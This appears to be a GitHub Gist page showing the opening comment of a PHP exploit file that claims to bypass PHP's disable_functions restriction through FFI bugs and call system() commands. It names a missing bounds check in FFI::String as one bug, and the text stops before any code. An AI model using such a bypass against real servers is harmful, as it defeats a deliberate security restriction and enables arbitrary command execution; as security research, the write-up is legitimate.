Skip to content

Instantly share code, notes, and snippets.

View huntergregal's full-sized avatar
🏠

Hunter Gregal huntergregal

🏠
View GitHub Profile
@huntergregal
huntergregal / php_FFI_exploit.php
Created July 8, 2020 00:08
PHP FFI disable_functions Bypass (no FFI::load or FFI::cdefs) hunter gregal
<?php
/*
FFI Exploit - uses 3 potential BUGS.
PHP was contacted and said nothing in FFI is a security issue.
Able to call system($cmd) without using FFI::load() or FFI::cdefs()
* BUG #1 (maybe intended, but why have any size checks then?)
no bounds check for FFI::String() when type is ZEND_FFI_TYPE_POINTER
(https://github.com/php/php-src/blob/php-7.4.7RC1/ext/ffi/ffi.c#L4411)